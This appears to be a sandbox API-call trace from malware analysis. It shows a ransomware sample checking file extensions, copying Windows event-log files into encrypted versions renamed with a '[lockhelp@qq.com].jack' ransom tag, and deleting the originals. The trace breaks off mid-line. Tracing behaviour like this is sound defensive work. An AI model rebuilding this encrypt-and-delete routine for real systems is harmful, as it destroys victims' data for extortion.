[0205.780] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.780] lstrlenW (lpString=".doc") returned 4 [0205.780] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".docx") returned 5 [0205.780] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.780] lstrlenW (lpString=".pdf") returned 4 [0205.780] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".xls") returned 4 [0205.780] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".xlsx") returned 5 [0205.780] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.780] lstrlenW (lpString=".ppt") returned 4 [0205.780] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.780] lstrlenW (lpString=".zip") returned 4 [0205.780] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".rar") returned 4 [0205.780] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".bz2") returned 4 [0205.780] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString=".7z") returned 3 [0205.780] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.780] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.780] lstrlenW (lpString=".dbf") returned 4 [0205.781] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.781] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.781] lstrlenW (lpString=".1cd") returned 4 [0205.781] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.781] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.781] lstrlenW (lpString=".jpg") returned 4 [0205.781] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.781] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.781] lstrlenW (lpString="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 45 [0205.781] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.781] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0205.781] CloseHandle (hObject=0x418) returned 1 [0205.781] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 0x20 [0205.782] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.782] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.782] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.782] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.782] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.782] GetLastError () returned 0x0 [0205.782] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.785] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.787] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.787] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x12e, lpOverlapped=0x0) returned 1 [0205.787] SetEndOfFile (hFile=0x424) returned 1 [0205.788] CloseHandle (hObject=0x424) returned 1 [0205.790] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.790] SetEndOfFile (hFile=0x418) returned 1 [0205.791] CloseHandle (hObject=0x418) returned 1 [0205.791] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.792] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 1 [0205.792] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.792] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.792] lstrlenW (lpString=".doc") returned 4 [0205.792] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.792] lstrlenW (lpString=".docx") returned 5 [0205.792] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.792] lstrlenW (lpString=".pdf") returned 4 [0205.792] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.792] lstrlenW (lpString=".xls") returned 4 [0205.792] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.792] lstrlenW (lpString=".xlsx") returned 5 [0205.793] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.793] lstrlenW (lpString=".ppt") returned 4 [0205.793] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString=".zip") returned 4 [0205.793] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString=".rar") returned 4 [0205.793] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString=".bz2") returned 4 [0205.793] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString=".7z") returned 3 [0205.793] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString=".dbf") returned 4 [0205.793] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString=".1cd") returned 4 [0205.793] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString=".jpg") returned 4 [0205.793] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.793] lstrlenW (lpString=".doc") returned 4 [0205.793] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.793] lstrlenW (lpString=".docx") returned 5 [0205.793] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.794] lstrlenW (lpString=".pdf") returned 4 [0205.794] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString=".xls") returned 4 [0205.794] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString=".xlsx") returned 5 [0205.794] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.794] lstrlenW (lpString=".ppt") returned 4 [0205.794] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.794] lstrlenW (lpString=".zip") returned 4 [0205.794] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString=".rar") returned 4 [0205.794] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString=".bz2") returned 4 [0205.794] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString=".7z") returned 3 [0205.794] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.794] lstrlenW (lpString=".dbf") returned 4 [0205.794] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.794] lstrlenW (lpString=".1cd") returned 4 [0205.794] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0205.794] lstrlenW (lpString=".jpg") returned 4 [0205.794] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.795] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.795] lstrlenW (lpString="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 48 [0205.795] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.795] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0205.795] CloseHandle (hObject=0x418) returned 1 [0205.795] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 0x20 [0205.795] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.795] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.796] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.796] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.796] GetLastError () returned 0x0 [0205.796] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.799] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.801] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.802] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x134, lpOverlapped=0x0) returned 1 [0205.802] SetEndOfFile (hFile=0x424) returned 1 [0205.802] CloseHandle (hObject=0x424) returned 1 [0205.804] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.804] SetEndOfFile (hFile=0x418) returned 1 [0205.806] CloseHandle (hObject=0x418) returned 1 [0205.806] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.806] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 1 [0205.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.806] lstrlenW (lpString=".doc") returned 4 [0205.806] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.806] lstrlenW (lpString=".docx") returned 5 [0205.807] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.807] lstrlenW (lpString=".pdf") returned 4 [0205.807] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString=".xls") returned 4 [0205.807] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString=".xlsx") returned 5 [0205.807] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.807] lstrlenW (lpString=".ppt") returned 4 [0205.807] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.807] lstrlenW (lpString=".zip") returned 4 [0205.807] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString=".rar") returned 4 [0205.807] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString=".bz2") returned 4 [0205.807] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString=".7z") returned 3 [0205.807] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.807] lstrlenW (lpString=".dbf") returned 4 [0205.807] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.807] lstrlenW (lpString=".1cd") returned 4 [0205.807] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.807] lstrlenW (lpString=".jpg") returned 4 [0205.807] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.808] lstrlenW (lpString=".doc") returned 4 [0205.808] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".docx") returned 5 [0205.808] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.808] lstrlenW (lpString=".pdf") returned 4 [0205.808] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".xls") returned 4 [0205.808] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".xlsx") returned 5 [0205.808] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.808] lstrlenW (lpString=".ppt") returned 4 [0205.808] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.808] lstrlenW (lpString=".zip") returned 4 [0205.808] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".rar") returned 4 [0205.808] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".bz2") returned 4 [0205.808] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString=".7z") returned 3 [0205.808] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.808] lstrlenW (lpString=".dbf") returned 4 [0205.808] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.808] lstrlenW (lpString=".1cd") returned 4 [0205.809] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0205.809] lstrlenW (lpString=".jpg") returned 4 [0205.809] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.809] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.809] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 57 [0205.809] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.809] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0205.809] CloseHandle (hObject=0x418) returned 1 [0205.809] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 0x20 [0205.809] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.810] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.810] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.810] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.810] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.811] GetLastError () returned 0x0 [0205.811] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.966] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.968] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.968] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x146, lpOverlapped=0x0) returned 1 [0205.968] SetEndOfFile (hFile=0x424) returned 1 [0205.968] CloseHandle (hObject=0x424) returned 1 [0205.977] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.977] SetEndOfFile (hFile=0x418) returned 1 [0205.978] CloseHandle (hObject=0x418) returned 1 [0205.978] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.979] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 1 [0205.979] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.979] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.979] lstrlenW (lpString=".doc") returned 4 [0205.979] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.979] lstrlenW (lpString=".docx") returned 5 [0205.979] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.979] lstrlenW (lpString=".pdf") returned 4 [0205.979] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.979] lstrlenW (lpString=".xls") returned 4 [0205.979] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.979] lstrlenW (lpString=".xlsx") returned 5 [0205.979] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.979] lstrlenW (lpString=".ppt") returned 4 [0205.979] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.979] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.979] lstrlenW (lpString=".zip") returned 4 [0205.979] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".rar") returned 4 [0205.980] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".bz2") returned 4 [0205.980] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".7z") returned 3 [0205.980] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.980] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.980] lstrlenW (lpString=".dbf") returned 4 [0205.980] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.980] lstrlenW (lpString=".1cd") returned 4 [0205.980] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.980] lstrlenW (lpString=".jpg") returned 4 [0205.980] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.980] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.980] lstrlenW (lpString=".doc") returned 4 [0205.980] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".docx") returned 5 [0205.980] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.980] lstrlenW (lpString=".pdf") returned 4 [0205.980] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".xls") returned 4 [0205.980] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.980] lstrlenW (lpString=".xlsx") returned 5 [0205.980] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.981] lstrlenW (lpString=".ppt") returned 4 [0205.981] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.981] lstrlenW (lpString=".zip") returned 4 [0205.981] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString=".rar") returned 4 [0205.981] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString=".bz2") returned 4 [0205.981] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString=".7z") returned 3 [0205.981] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.981] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.981] lstrlenW (lpString=".dbf") returned 4 [0205.981] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged 